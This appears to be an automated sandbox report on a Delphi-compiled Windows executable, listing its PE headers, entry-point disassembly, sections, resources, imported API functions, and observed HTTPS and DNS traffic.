Entrypoint Section:	CODE
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, BYTES_REVERSED_LO, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, BYTES_REVERSED_HI
DLL Characteristics:
Time Stamp:	0x2A425E19 [Fri Jun 19 22:22:17 1992 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	c13589351b888eacb104575a16a88b27

Entrypoint Preview

Instruction
push ebp
mov ebp, esp
add esp, FFFFFFF0h
mov eax, 0045D9C4h
call 00007FEE6CE70F7Dh
mov eax, dword ptr [0045F0F0h]
mov eax, dword ptr [eax]
call 00007FEE6CEBF6B5h
mov ecx, dword ptr [0045F1E4h]
mov eax, dword ptr [0045F0F0h]
mov eax, dword ptr [eax]
mov edx, dword ptr [0045D55Ch]
call 00007FEE6CEBF6B5h
mov eax, dword ptr [0045F0F0h]
mov eax, dword ptr [eax]
mov byte ptr [eax+5Bh], 00000000h
mov eax, dword ptr [0045F0F0h]
mov eax, dword ptr [eax]
call 00007FEE6CEBF71Eh
call 00007FEE6CE6EBCDh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x61000	0x22e8	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x6d000	0x411f1	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x66000	0x6980	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x65000	0x18	.rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
CODE	0x1000	0x5cc6c	0x5ce00	False	0.528831594886	data	6.53885536646	IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
DATA	0x5e000	0x1280	0x1400	False	0.4234375	data	3.90267388987	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
BSS	0x60000	0xd71	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.idata	0x61000	0x22e8	0x2400	False	0.359049479167	data	4.93636797538	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.tls	0x64000	0x10	0x0	False	0	empty	0.0	IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
.rdata	0x65000	0x18	0x200	False	0.05078125	data	0.206920017787	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc	0x66000	0x6980	0x6a00	False	0.634986733491	data	6.68626622134	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc	0x6d000	0x411f1	0x41200	False	0.529386846209	data	6.78044301186	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country
RT_BITMAP	0x6d674	0x1d0	data
RT_BITMAP	0x6d844	0x1e4	data
RT_BITMAP	0x6da28	0x1d0	data
RT_BITMAP	0x6dbf8	0x1d0	data
RT_BITMAP	0x6ddc8	0x1d0	data
RT_BITMAP	0x6df98	0x1d0	data
RT_BITMAP	0x6e168	0x1d0	data
RT_BITMAP	0x6e338	0x1d0	data
RT_BITMAP	0x6e508	0x1d0	data
RT_BITMAP	0x6e6d8	0x1d0	data
RT_BITMAP	0x6e8a8	0xe8	GLS_BINARY_LSB_FIRST	English	United States
RT_ICON	0x6e990	0x988	data	English	United States
RT_DIALOG	0x6f318	0x52	data
RT_STRING	0x6f36c	0x26c	data
RT_RCDATA	0x6f5d8	0x10	data
RT_RCDATA	0x6f5e8	0x2ec	data
RT_RCDATA	0x6f8d4	0xf50	Delphi compiled form 'TForm1'
RT_RCDATA	0x70824	0x11a	Delphi compiled form 'TForm2'
RT_RCDATA	0x70940	0x146	Delphi compiled form 'TForm3'
RT_RCDATA	0x70a88	0x10cff	Delphi compiled form 'TForm4'
RT_RCDATA	0x81788	0x141	Delphi compiled form 'TForm5'
RT_RCDATA	0x818cc	0x2c674	PC bitmap, Windows 3.x format, 225 x 225 x 4	English	United States
RT_GROUP_ICON	0xadf40	0x14	data	English	United States
None	0xadf54	0x29d	data	Romanian	Romania

Imports

DLL	Import
kernel32.dll	DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, GetVersion, GetCurrentThreadId, InterlockedDecrement, InterlockedIncrement, VirtualQuery, WideCharToMultiByte, MultiByteToWideChar, lstrlenA, lstrcpynA, LoadLibraryExA, GetThreadLocale, GetStartupInfoA, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetCommandLineA, FreeLibrary, FindFirstFileA, FindClose, ExitProcess, WriteFile, UnhandledExceptionFilter, RtlUnwind, RaiseException, GetStdHandle
user32.dll	GetKeyboardType, LoadStringA, MessageBoxA, CharNextA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
oleaut32.dll	SysFreeString, SysReAllocStringLen, SysAllocStringLen
kernel32.dll	TlsSetValue, TlsGetValue, LocalAlloc, GetModuleHandleA
advapi32.dll	RegQueryValueExA, RegOpenKeyExA, RegCloseKey
kernel32.dll	lstrcpyA, lstrcmpiA, WriteFile, WaitForSingleObject, VirtualQuery, VirtualProtect, VirtualAlloc, Sleep, SizeofResource, SetThreadLocale, SetFilePointer, SetEvent, SetErrorMode, SetEndOfFile, ResetEvent, ReadFile, MultiByteToWideChar, MulDiv, LockResource, LoadResource, LoadLibraryA, LeaveCriticalSection, InitializeCriticalSection, GlobalUnlock, GlobalSize, GlobalReAlloc, GlobalHandle, GlobalLock, GlobalFree, GlobalFindAtomA, GlobalDeleteAtom, GlobalAlloc, GlobalAddAtomA, GetVersionExA, GetVersion, GetUserDefaultLCID, GetTickCount, GetThreadLocale, GetSystemInfo, GetStringTypeExA, GetStdHandle, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLocalTime, GetLastError, GetFullPathNameA, GetDiskFreeSpaceA, GetDateFormatA, GetCurrentThreadId, GetCurrentProcessId, GetCPInfo, GetACP, FreeResource, InterlockedExchange, FreeLibrary, FormatMessageA, FindResourceA, EnumCalendarInfoA, EnterCriticalSection, DeleteCriticalSection, CreateThread, CreateFileA, CreateEventA, CompareStringA, CloseHandle
version.dll	VerQueryValueA, GetFileVersionInfoSizeA, GetFileVersionInfoA
gdi32.dll	UnrealizeObject, StretchBlt, SetWindowOrgEx, SetWinMetaFileBits, SetViewportOrgEx, SetTextColor, SetStretchBltMode, SetROP2, SetPixel, SetEnhMetaFileBits, SetDIBColorTable, SetBrushOrgEx, SetBkMode, SetBkColor, SelectPalette, SelectObject, SaveDC, RestoreDC, RectVisible, RealizePalette, Polyline, PlayEnhMetaFile, PatBlt, MoveToEx, MaskBlt, LineTo, IntersectClipRect, GetWindowOrgEx, GetWinMetaFileBits, GetTextMetricsA, GetTextExtentPoint32A, GetSystemPaletteEntries, GetStockObject, GetPixel, GetPaletteEntries, GetObjectA, GetEnhMetaFilePaletteEntries, GetEnhMetaFileHeader, GetEnhMetaFileDescriptionA, GetEnhMetaFileBits, GetDeviceCaps, GetDIBits, GetDIBColorTable, GetDCOrgEx, GetCurrentPositionEx, GetClipBox, GetBrushOrgEx, GetBitmapBits, ExcludeClipRect, DeleteObject, DeleteEnhMetaFile, DeleteDC, CreateSolidBrush, CreatePenIndirect, CreatePalette, CreateHalftonePalette, CreateFontIndirectA, CreateEnhMetaFileA, CreateDIBitmap, CreateDIBSection, CreateCompatibleDC, CreateCompatibleBitmap, CreateBrushIndirect, CreateBitmap, CopyEnhMetaFileA, CloseEnhMetaFile, BitBlt
user32.dll	CreateWindowExA, WindowFromPoint, WinHelpA, WaitMessage, UpdateWindow, UnregisterClassA, UnhookWindowsHookEx, TranslateMessage, TranslateMDISysAccel, TrackPopupMenu, SystemParametersInfoA, ShowWindow, ShowScrollBar, ShowOwnedPopups, ShowCursor, SetWindowsHookExA, SetWindowPos, SetWindowPlacement, SetWindowLongA, SetTimer, SetScrollRange, SetScrollPos, SetScrollInfo, SetRect, SetPropA, SetParent, SetMenuItemInfoA, SetMenu, SetForegroundWindow, SetFocus, SetCursor, SetClassLongA, SetCapture, SetActiveWindow, SendMessageA, ScrollWindow, ScreenToClient, RemovePropA, RemoveMenu, ReleaseDC, ReleaseCapture, RegisterWindowMessageA, RegisterClipboardFormatA, RegisterClassA, RedrawWindow, PtInRect, PostQuitMessage, PostMessageA, PeekMessageA, OffsetRect, OemToCharA, MessageBoxA, MapWindowPoints, MapVirtualKeyA, LoadStringA, LoadKeyboardLayoutA, LoadIconA, LoadCursorA, LoadBitmapA, KillTimer, IsZoomed, IsWindowVisible, IsWindowEnabled, IsWindow, IsRectEmpty, IsIconic, IsDialogMessageA, IsChild, InvalidateRect, IntersectRect, InsertMenuItemA, InsertMenuA, InflateRect, GetWindowThreadProcessId, GetWindowTextA, GetWindowRect, GetWindowPlacement, GetWindowLongA, GetWindowDC, GetTopWindow, GetSystemMetrics, GetSystemMenu, GetSysColorBrush, GetSysColor, GetSubMenu, GetScrollRange, GetScrollPos, GetScrollInfo, GetPropA, GetParent, GetWindow, GetMessageTime, GetMenuStringA, GetMenuState, GetMenuItemInfoA, GetMenuItemID, GetMenuItemCount, GetMenu, GetLastActivePopup, GetKeyboardState, GetKeyboardLayoutList, GetKeyboardLayout, GetKeyState, GetKeyNameTextA, GetIconInfo, GetForegroundWindow, GetFocus, GetDlgItem, GetDesktopWindow, GetDCEx, GetDC, GetCursorPos, GetCursor, GetClipboardData, GetClientRect, GetClassNameA, GetClassInfoA, GetCapture, GetActiveWindow, FrameRect, FindWindowA, FillRect, EqualRect, EnumWindows, EnumThreadWindows, EndPaint, EnableWindow, EnableScrollBar, EnableMenuItem, DrawTextA, DrawMenuBar, DrawIconEx, DrawIcon, DrawFrameControl, DrawEdge, DispatchMessageA, DestroyWindow, DestroyMenu, DestroyIcon, DestroyCursor, DeleteMenu, DefWindowProcA, DefMDIChildProcA, DefFrameProcA, CreatePopupMenu, CreateMenu, CreateIcon, ClientToScreen, CheckMenuItem, CallWindowProcA, CallNextHookEx, BeginPaint, CharNextA, CharLowerBuffA, CharLowerA, CharToOemA, AdjustWindowRectEx, ActivateKeyboardLayout
kernel32.dll	Sleep
oleaut32.dll	SafeArrayPtrOfIndex, SafeArrayGetUBound, SafeArrayGetLBound, SafeArrayCreate, VariantChangeType, VariantCopy, VariantClear, VariantInit
ole32.dll	CreateStreamOnHGlobal, IsAccelerator, OleDraw, OleSetMenuDescriptor, CoCreateInstance, CoGetClassObject, CoUninitialize, CoInitialize, IsEqualGUID
oleaut32.dll	GetErrorInfo, SysFreeString
comctl32.dll	ImageList_SetIconSize, ImageList_GetIconSize, ImageList_Write, ImageList_Read, ImageList_GetDragImage, ImageList_DragShowNolock, ImageList_SetDragCursorImage, ImageList_DragMove, ImageList_DragLeave, ImageList_DragEnter, ImageList_EndDrag, ImageList_BeginDrag, ImageList_Remove, ImageList_DrawEx, ImageList_Draw, ImageList_GetBkColor, ImageList_SetBkColor, ImageList_ReplaceIcon, ImageList_Add, ImageList_SetImageCount, ImageList_GetImageCount, ImageList_Destroy, ImageList_Create
comdlg32.dll	GetSaveFileNameA, GetOpenFileNameA

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States
Romanian	Romania

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
06/04/21-09:40:38.959441	ICMP	402	ICMP Destination Unreachable Port Unreachable			192.168.2.4	8.8.8.8

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 4, 2021 09:39:57.218050957 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.262564898 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.268052101 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.334944010 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.379723072 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.388204098 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.388297081 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.388375998 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.388401985 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.461925983 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.504628897 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.505026102 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.505136013 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.522104025 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.564855099 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586134911 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586157084 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586173058 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586184978 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586200953 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586211920 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586229086 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586240053 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586283922 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.586666107 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586683035 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.586750984 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.586769104 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.587277889 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.587305069 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.587810993 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.588371992 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.588399887 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.588514090 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.589490891 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.589515924 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.589610100 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.589622021 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.590625048 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.590650082 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.590735912 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.590747118 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.591744900 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.591770887 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.591828108 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.591840029 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.592016935 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.592026949 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.592864990 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.592889071 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.593094110 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.594032049 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.594057083 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.594161034 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.594177008 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.595105886 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.595154047 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.595601082 CEST	49730	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.595674038 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.596261024 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.596287012 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.596381903 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.597383022 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.597409010 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.598481894 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.598506927 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.598551035 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.598568916 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.598679066 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.599602938 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.599723101 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.630860090 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.630896091 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.630976915 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.631361008 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.631391048 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.631433964 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.632111073 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.632488012 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.632520914 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.633518934 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.633591890 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.633624077 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.633676052 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.634728909 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.634762049 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.634826899 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.635891914 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.635926008 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.636374950 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.636998892 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.637042046 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.637072086 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.638139009 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.638170958 CEST	443	49729	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.638217926 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.638233900 CEST	49729	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.639641047 CEST	443	49730	162.159.130.233	192.168.2.4
Jun 4, 2021 09:39:57.639751911 CEST	49730	443	192.168.2.4	162.159.130.233
Jun 4, 2021 09:39:57.640456915 CEST	49730	443	192.168.2.4	162.159.130.233

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 4, 2021 09:39:47.727473021 CEST	49257	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:47.771238089 CEST	53	49257	8.8.8.8	192.168.2.4
Jun 4, 2021 09:39:48.525234938 CEST	62389	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:48.574261904 CEST	53	62389	8.8.8.8	192.168.2.4
Jun 4, 2021 09:39:49.486754894 CEST	49910	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:49.535496950 CEST	53	49910	8.8.8.8	192.168.2.4
Jun 4, 2021 09:39:50.494714022 CEST	55854	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:50.536011934 CEST	53	55854	8.8.8.8	192.168.2.4
Jun 4, 2021 09:39:57.147141933 CEST	64549	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:57.198767900 CEST	53	64549	8.8.8.8	192.168.2.4
Jun 4, 2021 09:39:57.574749947 CEST	63153	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:39:57.624927998 CEST	53	63153	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:00.506942034 CEST	52991	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:00.555979013 CEST	53	52991	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:01.415688038 CEST	53700	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:01.457792997 CEST	53	53700	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:02.315181971 CEST	51726	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:02.356365919 CEST	53	51726	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:03.151670933 CEST	56794	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:03.202284098 CEST	53	56794	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:03.958817959 CEST	56534	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:03.999900103 CEST	53	56534	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:04.839706898 CEST	56627	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:04.880892038 CEST	53	56627	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:05.650723934 CEST	56621	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:05.699759960 CEST	53	56621	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:06.939809084 CEST	63116	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:06.982979059 CEST	53	63116	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:12.372137070 CEST	64078	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:12.415651083 CEST	53	64078	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:13.298985004 CEST	64801	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:13.348169088 CEST	53	64801	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:14.205878973 CEST	61721	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:14.247083902 CEST	53	61721	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:15.134371996 CEST	51255	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:15.177704096 CEST	53	51255	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:16.026128054 CEST	61522	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:16.069525003 CEST	52337	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:16.111032963 CEST	53	52337	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:16.129209995 CEST	53	61522	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:17.293454885 CEST	55046	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:17.515693903 CEST	53	55046	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:18.532757044 CEST	49612	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:18.656070948 CEST	53	49612	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:19.782900095 CEST	49285	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:19.829819918 CEST	50601	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:19.848630905 CEST	53	49285	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:19.881160975 CEST	53	50601	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:20.890875101 CEST	60875	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:20.940700054 CEST	53	60875	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:22.111352921 CEST	56448	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:22.180686951 CEST	53	56448	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:23.189179897 CEST	59172	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:23.238006115 CEST	53	59172	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:24.409887075 CEST	62420	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:24.458822012 CEST	53	62420	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:25.471311092 CEST	60579	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:25.520107031 CEST	53	60579	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:26.689762115 CEST	50183	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:26.738759995 CEST	53	50183	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:27.849464893 CEST	61531	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:27.899045944 CEST	53	61531	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:29.418231964 CEST	49228	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:29.469103098 CEST	53	49228	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:29.655761957 CEST	59794	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:29.707072973 CEST	53	59794	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:30.482249975 CEST	55916	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:30.605134964 CEST	53	55916	8.8.8.8	192.168.2.4
Jun 4, 2021 09:40:31.892159939 CEST	52752	53	192.168.2.4	8.8.8.8
Jun 4, 2021 09:40:32.028281927 CEST	53	52752	8.8.8.8	192.168.2.4
